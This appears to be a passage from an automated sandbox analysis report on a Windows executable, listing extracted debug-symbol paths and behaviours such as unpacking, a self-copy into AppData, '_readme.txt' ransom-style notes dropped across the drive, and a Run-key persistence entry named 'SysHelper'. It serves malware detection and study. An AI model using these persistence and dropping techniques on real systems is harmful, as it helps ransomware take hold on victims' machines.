        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*> source: C0XWmZAnYk.exe, 00000006.00000003.2517312933.00000000032BE000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393360628.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.00000000032BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .DATcontainentkrnlmp.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003117000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516084073.000000000311B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\P source: C0XWmZAnYk.exe, 00000006.00000003.2622120522.0000000003621000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\C source: C0XWmZAnYk.exe, 00000006.00000003.2660383574.0000000003749000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664709026.0000000003756000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2665419996.0000000003775000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbZ0[ source: C0XWmZAnYk.exe, 00000006.00000003.2517804596.00000000030F7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2515902450.000000000315C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2392919853.0000000003336000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393128569.0000000003352000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\bwe\ source: C0XWmZAnYk.exe, 00000006.00000003.2672302917.000000000319D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2672161713.0000000003194000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674313823.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ion D source: C0XWmZAnYk.exe, 00000006.00000003.2671662038.0000000003386000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: C0XWmZAnYk.exe, C0XWmZAnYk.exe, 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: C0XWmZAnYk.exe, 00000006.00000003.2591021767.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590747868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601778052.0000000003107000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601623756.0000000003102000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600894064.00000000030FF000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2591557050.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\en-IN\od.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2674124024.00000000036FA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\5g source: C0XWmZAnYk.exe, 00000006.00000003.2665419996.00000000037F9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: C0XWmZAnYk.exe, 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\8yKAc source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ication Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2642794502.0000000003640000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641554620.0000000003639000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.rigd source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\0 source: C0XWmZAnYk.exe, 00000006.00000003.2665419996.00000000037E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l source: C0XWmZAnYk.exe, 00000006.00000003.2589870665.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2591201066.0000000003132000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\2txyewy\ source: C0XWmZAnYk.exe, 00000006.00000003.2672302917.000000000319D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2672161713.0000000003194000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674313823.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2643245357.0000000003712000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\DVR source: C0XWmZAnYk.exe, 00000006.00000003.2622483733.0000000003447000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622771619.000000000347C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393360628.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\Cv source: C0XWmZAnYk.exe, 00000006.00000003.2674038254.0000000003681000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.0000000003651000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654119617.0000000003681000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655075144.0000000003699000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\| source: C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.rigd source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2623228600.0000000003460000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622483733.0000000003447000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600307497.000000000343F000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622861915.0000000003454000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600375568.0000000003454000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\\LD source: C0XWmZAnYk.exe, 00000006.00000003.2355657291.0000000003100000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: C0XWmZAnYk.exe, 00000006.00000003.2672094700.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\me\0 source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2677146833.0000000003755000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674440294.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\ source: C0XWmZAnYk.exe, 00000006.00000003.2665007852.00000000036A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\!u source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ls\ source: C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\'GfK source: C0XWmZAnYk.exe, 00000006.00000003.2516054824.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569291711.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569964189.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570520442.000000000310A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\C^ source: C0XWmZAnYk.exe, 00000006.00000003.2665181944.0000000003116000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ies\inJO source: C0XWmZAnYk.exe, 00000006.00000003.2570024830.000000000330D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569761077.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600081582.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570316062.000000000330E000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601014852.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2589166034.0000000003312000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601595127.0000000003313000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\QRfHa source: C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\~M source: C0XWmZAnYk.exe, 00000006.00000003.2642157736.0000000003313000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641465788.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622184907.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.rigdd source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2643245357.0000000003712000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbtDir\LogFile_October_4_2023__16_5_0.txt{ source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2622120522.0000000003621000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623261146.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623323200.0000000003649000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb? source: C0XWmZAnYk.exe, 00000006.00000003.2517804596.00000000030F7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*Z source: C0XWmZAnYk.exe, 00000006.00000003.2677146833.0000000003755000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674440294.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\bbwe\e\L source: C0XWmZAnYk.exe, 00000006.00000003.2672094700.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2601560018.00000000035F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590007588.0000000003160000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2622120522.0000000003621000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623261146.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2623323200.0000000003649000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: C0XWmZAnYk.exe, 00000006.00000003.2622184907.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600081582.00000000032B1000.00000004.00000020.00020000.00000000.sdmp
        Source: C0XWmZAnYk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: C0XWmZAnYk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: C0XWmZAnYk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: C0XWmZAnYk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: C0XWmZAnYk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeUnpacked PE file: 2.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeUnpacked PE file: 6.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeUnpacked PE file: 7.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeUnpacked PE file: 9.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeUnpacked PE file: 12.2.C0XWmZAnYk.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_0040B240 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0040B240
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00A560AF push ecx; retf 0_2_00A560B2
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C58F05 push ecx; ret 0_2_00C58F18
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00A700AF push ecx; retf 4_2_00A700B2
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CD8F05 push ecx; ret 4_2_00CD8F18
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00B7C0AF push ecx; retf 5_2_00B7C0B2
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C38F05 push ecx; ret 5_2_00C38F18

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeJump to dropped file
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
